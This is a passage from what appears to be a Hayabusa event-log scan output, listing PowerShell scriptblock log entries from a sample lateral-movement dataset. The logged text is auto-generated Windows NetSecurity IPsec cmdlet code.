$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = 
$null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'En",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,abled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = 
${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = 
${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { 
[object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In';,../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,abled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = 
$null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { 
[object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
